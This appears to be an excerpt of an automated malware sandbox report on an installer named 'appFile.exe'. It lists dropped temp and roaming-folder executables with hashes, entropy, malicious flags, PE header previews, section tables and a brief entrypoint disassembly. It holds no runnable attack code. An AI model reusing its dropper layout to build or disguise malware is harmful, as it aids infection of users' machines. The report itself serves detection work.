                                                                                                                                  SSDEEP:1536:XiWtyZ0HAl6cz/vrDbbsS++od0tRdCAqEztFsb9nEikPaH4Dsxcxbjt/q+:xyZaAlFLD/s1+oWztFseiH4DqcxNi+
                                                                                                                                  MD5:8849DBB726C66F7297184006A34D526D
                                                                                                                                  SHA1:5DAF127A5370D757BC73EFFE423712941A9FCADA
                                                                                                                                  SHA-256:558AFF090F772976C7BAC34FEE225F1AEAEEB47B9342132C1085F78E9350CFC2
                                                                                                                                  SHA-512:3794EF1A9D5AA0C308D7F6FAC34A1C431D74EF277357EFD9F09D194F1C72FFF5A4DA1F9FB4F23BD882B398C1363927F1E802366B27755DE1B998107B0B484AB2
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:B...F...iKY..|U...)...'6.....J-L...$...!.WU....Gn...d.,].6..Sv........r....8..>.e.*./]...<t<.ie.Ij$.;..X..[........=x.(......m.`..y..W..........9.......HjJ/...33..Sb...0.^...;...F. ............i...r..M.y...-.mE.J_..ex.....7...<...(??T"E5%.e]0...n...K.4..k.y...`...+,.p.{.P.xW..@........./VR...W..,....2.[.o.6....M4.......Gp......E...A....7./...r.d.>..w..f3|..7.w...L!T....]..LJ..O......&.g...qM.".c .m.W...#..>.s..[.....`...T.........xT>..M.../c..%...}c.... .....Y.e51.b..U../.[.4.3.I.>w.ly}.RM\pd..}#nQ.W.......N......Y...#l..U.y..E........7...'.I.O~.}S..7.....g+cD.+5...{.@.*\...3}..`.?O...<...T......$.....rC........?..%..C.....v...'zp.3.<}.!..V..#..QF.@..u.Jcotr.A.....T..w?..8t....K..;.....9*\..Y..E.v,..r..X..L2d...R...&.....4@Z..*f....-.5....67r.}...e..}..;......ci..,.......X>..W..H .f~..d...-&i.. ..`.4V.k.%.u.T-....L.....Z...@.;...*.qmz..i$.."......4....\JDOi]..7J..T.B...F...........C..t..8....2~.~.p....9p..<.t.[6.XE.Q..D.....1.s..

                                                                                                                                  C:\Users\user\AppData\Local\Temp\Vista

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\Desktop\appFile.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):51200
                                                                                                                                  Entropy (8bit):7.9961602707410995
                                                                                                                                  Encrypted:true
                                                                                                                                  SSDEEP:768:Q0RWQIsFbAwK43X5cIVL2pMaSSH1OYVfV54JEyxciiyA5n6Ho5R7aiR4szhho:QRcbnK4H5cAwfH1dVfIJlWFh6Ho5ReUu
                                                                                                                                  MD5:F35E19B54DE59EE1BA24FF4157BC9FF9
                                                                                                                                  SHA1:6E81BD02C534321B49D4E3B2EE5FE3E0ED8DDE03
                                                                                                                                  SHA-256:D889699E597CFB9BA3FD5FC0E807F9E9B4047E350014331B3D1A335F8C1C64F4
                                                                                                                                  SHA-512:FE3C0750593D858A8CC9FE15DAC08FA241A272A1696D06BF62272A7BF820DBA391E2307BF61574CD8A090DDD5F4BB25DA68DA5CCF6C2BA0EEA12A27497A5E802
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:m.CK..P....L.^J.L.Kj.........:|Xq~...F#.O.L4.+..........%........)...BU.).F.l..o.|..=.C../^..|...*g..'d."{.......%oO...m../..G........V....V..w.P.G.....*..x..kP.IU....f..@...c.V.Od...pc.........D..lp..(..C....7....m.d13.a..O.7.n..o."qS.Y!.+.r.?......~.....,....s........f.2........}W0.0i.k..\.w[W.7Y3V.6(..`.sE.&5..Q.......Z.J.3....2#.'...Px..Y..'....yM...5{.Q..i..k.A.F..;....YaJ...Zsk.<c..$..,... ./.,...Nwy.La./..VC.G....3H.e.Bd....6.Rk..fR.,p!Fb+.}...>.+5.../...q{..G.U.tto..I._.E.f.....<.6.....`.).;..e:.7.P......SC.....jS#.(S.-...-.........RLVF...6..<9].?R.,.w.%..6..C.!....;.......(...#....q...Wkv..X/0M..R+..;....:....".*....A.$.......j.""..+..cf...f..C'.3y..f....(....c>...oGJ.r.f......X3.(C....N8.a(mf..7...SuL....)N.VVx.......8.:y......oQ.N.G..n\.Q.{.j...6...v......_.^......o..w2?.._T.<^.<..g.....~.4)...h...!j...E.HiD........3H.......v.......rM.....z....4.Y..=..O.a..5...l..1..(......t....w&...x.k0.......e....1....E....

                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qo4itofv.4jt.psm1

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):60
                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tbrx50i5.fd0.ps1

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):60
                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                  C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\S25734VPZD3VQL5I0DLUI2DAUAHZO.exe
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):3367424
                                                                                                                                  Entropy (8bit):6.53001282597034
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:98304:qJYVM+LtVt3P/KuG2ONG9iqLRQEd333T:7VL/tnHGYiql5l
                                                                                                                                  MD5:A62041070E18901131CBBE7825EC4EC7
                                                                                                                                  SHA1:67DB71F5A885B1E417B1272218E6B814C45A6C93
                                                                                                                                  SHA-256:E25EF8AA3AB40EE6950DACC4CCD9EDD1EBE973D45109F6EEF34F7F49E26A2E27
                                                                                                                                  SHA-512:AE560D59071F8E2D484E5607E6A3C6CAC52F011A6CB3F16B5EECB767F555D10A480AF32FE0BEB0DC6FF4B6BEC99B536AEBA58AD6697DAB72AAF60BD46F3BFC83
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04.......3...@......@...................P,.n.....,.j:...P0.p.....................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc...p....P0......./.............@..@.............04......`3.............@..@................

                                                                                                                                  C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\S25734VPZD3VQL5I0DLUI2DAUAHZO.exe
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):3367424
                                                                                                                                  Entropy (8bit):6.53001282597034
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:98304:qJYVM+LtVt3P/KuG2ONG9iqLRQEd333T:7VL/tnHGYiql5l
                                                                                                                                  MD5:A62041070E18901131CBBE7825EC4EC7
                                                                                                                                  SHA1:67DB71F5A885B1E417B1272218E6B814C45A6C93
                                                                                                                                  SHA-256:E25EF8AA3AB40EE6950DACC4CCD9EDD1EBE973D45109F6EEF34F7F49E26A2E27
                                                                                                                                  SHA-512:AE560D59071F8E2D484E5607E6A3C6CAC52F011A6CB3F16B5EECB767F555D10A480AF32FE0BEB0DC6FF4B6BEC99B536AEBA58AD6697DAB72AAF60BD46F3BFC83
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04.......3...@......@...................P,.n.....,.j:...P0.p.....................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc...p....P0......./.............@..@.............04......`3.............@..@................

                                                                                                                                  C:\Users\user\AppData\Local\Temp\is-O7LIQ.tmp\_isetup\_isdecmp.dll

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp
                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):35616
                                                                                                                                  Entropy (8bit):6.953519176025623
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
                                                                                                                                  MD5:C6AE924AD02500284F7E4EFA11FA7CFC
                                                                                                                                  SHA1:2A7770B473B0A7DC9A331D017297FF5AF400FED8
                                                                                                                                  SHA-256:31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
                                                                                                                                  SHA-512:F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P......................................D=...............................P.......P..(....................L.. ?...p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\Users\user\AppData\Local\Temp\is-O7LIQ.tmp\_isetup\_setup64.tmp

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp
                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):6144
                                                                                                                                  Entropy (8bit):4.720366600008286
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                  MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                  SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                  SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                  SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                  Malicious:false
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\Users\user\AppData\Local\Temp\is-QU1EC.tmp\_isetup\_isdecmp.dll

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp
                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):35616
                                                                                                                                  Entropy (8bit):6.953519176025623
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
                                                                                                                                  MD5:C6AE924AD02500284F7E4EFA11FA7CFC
                                                                                                                                  SHA1:2A7770B473B0A7DC9A331D017297FF5AF400FED8
                                                                                                                                  SHA-256:31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
                                                                                                                                  SHA-512:F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P......................................D=...............................P.......P..(....................L.. ?...p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\Users\user\AppData\Local\Temp\is-QU1EC.tmp\_isetup\_setup64.tmp

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp
                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):6144
                                                                                                                                  Entropy (8bit):4.720366600008286
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                  MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                  SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                  SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                  SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                  Malicious:false
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\Users\user\AppData\Roaming\UltraMedia\is-NG40A.tmp

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1063239551
                                                                                                                                  Entropy (8bit):0.19795435725041813
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:
                                                                                                                                  MD5:C12ED31F29EF510393AE36661F44F102
                                                                                                                                  SHA1:2F00EEEA897AD851E65FE3A877D9B6380AEE484D
                                                                                                                                  SHA-256:8467A252F34645C19D8CDE87BBC4E214E81C58BB8D0376C67A43086222508CA0
                                                                                                                                  SHA-512:2075F2B500D65D8187470BA66EDFB268CE165F4841921F04629449CC62ED40D2D02FAE29CF0CA7C4DC7DDA925EA69E30C11E96042108B83899FF6150DBFC5CBD
                                                                                                                                  Malicious:true
                                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..................N.........$.N.......N...@..........................P............@......@........................... Q..@....T..`............_?.)....Q.,N............................Q.....................................................CODE......N.......N................. ..`DATA..........N.......N.............@...BSS...........P......hP..................idata...@... Q..B...hP.............@....tls....0....pQ.......P..................rdata........Q.......P.............@..P.reloc.. N....Q..P....P.............@..P.rsrc....`....T..b....S.............@..P..............t.......s.............@..P........................................................................................................................................

                                                                                                                                  C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exe (copy)

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1063239551
                                                                                                                                  Entropy (8bit):0.19795435725041813
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:
                                                                                                                                  MD5:C12ED31F29EF510393AE36661F44F102
                                                                                                                                  SHA1:2F00EEEA897AD851E65FE3A877D9B6380AEE484D
                                                                                                                                  SHA-256:8467A252F34645C19D8CDE87BBC4E214E81C58BB8D0376C67A43086222508CA0
                                                                                                                                  SHA-512:2075F2B500D65D8187470BA66EDFB268CE165F4841921F04629449CC62ED40D2D02FAE29CF0CA7C4DC7DDA925EA69E30C11E96042108B83899FF6150DBFC5CBD
                                                                                                                                  Malicious:true
                                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..................N.........$.N.......N...@..........................P............@......@........................... Q..@....T..`............_?.)....Q.,N............................Q.....................................................CODE......N.......N................. ..`DATA..........N.......N.............@...BSS...........P......hP..................idata...@... Q..B...hP.............@....tls....0....pQ.......P..................rdata........Q.......P.............@..P.reloc.. N....Q..P....P.............@..P.rsrc....`....T..b....S.............@..P..............t.......s.............@..P........................................................................................................................................

                                                                                                                                  Static File Info

                                                                                                                                  General

                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Entropy (8bit):7.338553285001417
                                                                                                                                  TrID:
                                                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 47.14%
                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 47.09%
                                                                                                                                  • NSIS - Nullsoft Scriptable Install System (846627/2) 3.99%
                                                                                                                                  • DirectShow filter (201580/2) 0.95%
                                                                                                                                  • Windows ActiveX control (116523/4) 0.55%
                                                                                                                                  File name:appFile.exe
                                                                                                                                  File size:37'872'978 bytes
                                                                                                                                  MD5:7c498eca1b725e8a85fef298184ccbb9
                                                                                                                                  SHA1:77ce8a334475d9469c43f668b6b09feb04768500
                                                                                                                                  SHA256:d385d42cc611f7964ea583e10d991118f91456e88d76b3be14c047e4acdaab5c
                                                                                                                                  SHA512:245ec4b94c92bc9ee9bc393010666ac5eda53325ded0fda1923fe151e33ab2f1bdcd3a2a4e4fe41d8b99f4088bd74d4ca6270b939f0752538679ec26ac3ad2cb
                                                                                                                                  SSDEEP:393216:KdekoWJfJn36OnUASZx8EeCjgfAChEzie46SBnZ43ie1DKdHmE+XBUIvvpPRElm:KdRPJQuU7WWgfAYEziR6SBnayeOHSXEk
                                                                                                                                  TLSH:2A87D002B7E84065F5F726302579AB27693EBAB41F6082DF1255665E2CB27C1DF3032B
                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...z...B...8.....

                                                                                                                                  File Icon

                                                                                                                                  Icon Hash:3a1c4e4f4f87964d

                                                                                                                                  Static PE Info

                                                                                                                                  General

                                                                                                                                  Entrypoint:0x4038af
                                                                                                                                  Entrypoint Section:.text
                                                                                                                                  Digitally signed:true
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  Subsystem:windows gui
                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                  Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                                                  TLS Callbacks:
                                                                                                                                  CLR (.Net) Version:
                                                                                                                                  OS Version Major:5
                                                                                                                                  OS Version Minor:0
                                                                                                                                  File Version Major:5
                                                                                                                                  File Version Minor:0
                                                                                                                                  Subsystem Version Major:5
                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                  Import Hash:be41bf7b8cc010b614bd36bbca606973

                                                                                                                                  Authenticode Signature

                                                                                                                                  Signature Valid:
                                                                                                                                  Signature Issuer:
                                                                                                                                  Signature Validation Error:
                                                                                                                                  Error Number:
                                                                                                                                  Not Before, Not After
                                                                                                                                    Subject Chain
                                                                                                                                      Version:
                                                                                                                                      Thumbprint MD5:
                                                                                                                                      Thumbprint SHA-1:
                                                                                                                                      Thumbprint SHA-256:
                                                                                                                                      Serial:

                                                                                                                                      Entrypoint Preview

                                                                                                                                      Instruction
                                                                                                                                      sub esp, 000002D4h
                                                                                                                                      push ebx
                                                                                                                                      push ebp
                                                                                                                                      push esi
                                                                                                                                      push edi
                                                                                                                                      push 00000020h
                                                                                                                                      xor ebp, ebp
                                                                                                                                      pop esi
                                                                                                                                      mov dword ptr [esp+18h], ebp
                                                                                                                                      mov dword ptr [esp+10h], 0040A268h
                                                                                                                                      mov dword ptr [esp+14h], ebp
                                                                                                                                      call dword ptr [00409030h]
                                                                                                                                      push 00008001h
                                                                                                                                      call dword ptr [004090B4h]
                                                                                                                                      push ebp
                                                                                                                                      call dword ptr [004092C0h]
                                                                                                                                      push 00000008h
                                                                                                                                      mov dword ptr [0047EB98h], eax
                                                                                                                                      call 00007F94648C1A0Bh
                                                                                                                                      push ebp
                                                                                                                                      push 000002B4h
                                                                                                                                      mov dword ptr [0047EAB0h], eax
                                                                                                                                      lea eax, dword ptr [esp+38h]
                                                                                                                                      push eax
                                                                                                                                      push ebp
                                                                                                                                      push 0040A264h
                                                                                                                                      call dword ptr [00409184h]
                                                                                                                                      push 0040A24Ch
                                                                                                                                      push 00476AA0h
                                                                                                                                      call 00007F94648C16EDh
                                                                                                                                      call dword ptr [004090B0h]
                                                                                                                                      push eax
                                                                                                                                      mov edi, 004CF0A0h
                                                                                                                                      push edi
                                                                                                                                      call 00007F94648C16DBh
                                                                                                                                      push ebp
                                                                                                                                      call dword ptr [00409134h]
                                                                                                                                      cmp word ptr [004CF0A0h], 0022h
                                                                                                                                      mov dword ptr [0047EAB8h], eax
                                                                                                                                      mov eax, edi
                                                                                                                                      jne 00007F94648BEFDAh
                                                                                                                                      push 00000022h
                                                                                                                                      pop esi
                                                                                                                                      mov eax, 004CF0A2h
                                                                                                                                      push esi
                                                                                                                                      push eax
                                                                                                                                      call 00007F94648C13B1h
                                                                                                                                      push eax
                                                                                                                                      call dword ptr [00409260h]
                                                                                                                                      mov esi, eax
                                                                                                                                      mov dword ptr [esp+1Ch], esi
                                                                                                                                      jmp 00007F94648BF063h
                                                                                                                                      push 00000020h
                                                                                                                                      pop ebx
                                                                                                                                      cmp ax, bx
                                                                                                                                      jne 00007F94648BEFDAh
                                                                                                                                      add esi, 02h
                                                                                                                                      cmp word ptr [esi], bx

                                                                                                                                      Rich Headers

                                                                                                                                      Programming Language:
                                                                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                                                                      • [ C ] VS2010 SP1 build 40219
                                                                                                                                      • [RES] VS2010 SP1 build 40219
                                                                                                                                      • [LNK] VS2010 SP1 build 40219

                                                                                                                                      Data Directories

                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xac400xb4.rdata
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000x20c6e.rsrc
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0xfec7f0x36e8
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x994.ndata
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x90000x2d0.rdata
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                      Sections

                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                      .text0x10000x728c0x7400419d4e1be1ac35a5db9c47f553b27ceaFalse0.6566540948275862data6.499708590628113IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                      .rdata0x90000x2b6e0x2c00cca1ca3fbf99570f6de9b43ce767f368False0.3678977272727273data4.497932535153822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                      .data0xc0000x72b9c0x20077f0839f8ebea31040e462523e1c770eFalse0.279296875data1.8049406284608531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                      .ndata0x7f0000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                      .rsrc0x1000000x20c6e0x20e00153d55776e7a63d33ed539aa7eb69d8bFalse0.5166127019961977data5.178055190114233IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                      .reloc0x1210000xfd60x1000dfae800432b507ebd6e4071a7f688d8bFalse0.567626953125data5.316381554028179IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                      Resources

                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                      RT_ICON0x10030c0x2327PNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.001222358039782
                                                                                                                                      RT_ICON0x1026340x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.5455655004068348
                                                                                                                                      RT_ICON0x104c9c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3779 x 3779 px/m0.45478723404255317
                                                                                                                                      RT_ICON0x1051040x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m0.30072614107883816
                                                                                                                                      RT_ICON0x1076ac0x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 3779 x 3779 px/m0.24179285460783154
                                                                                                                                      RT_ICON0x117ed40x84e3PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9950909785707986
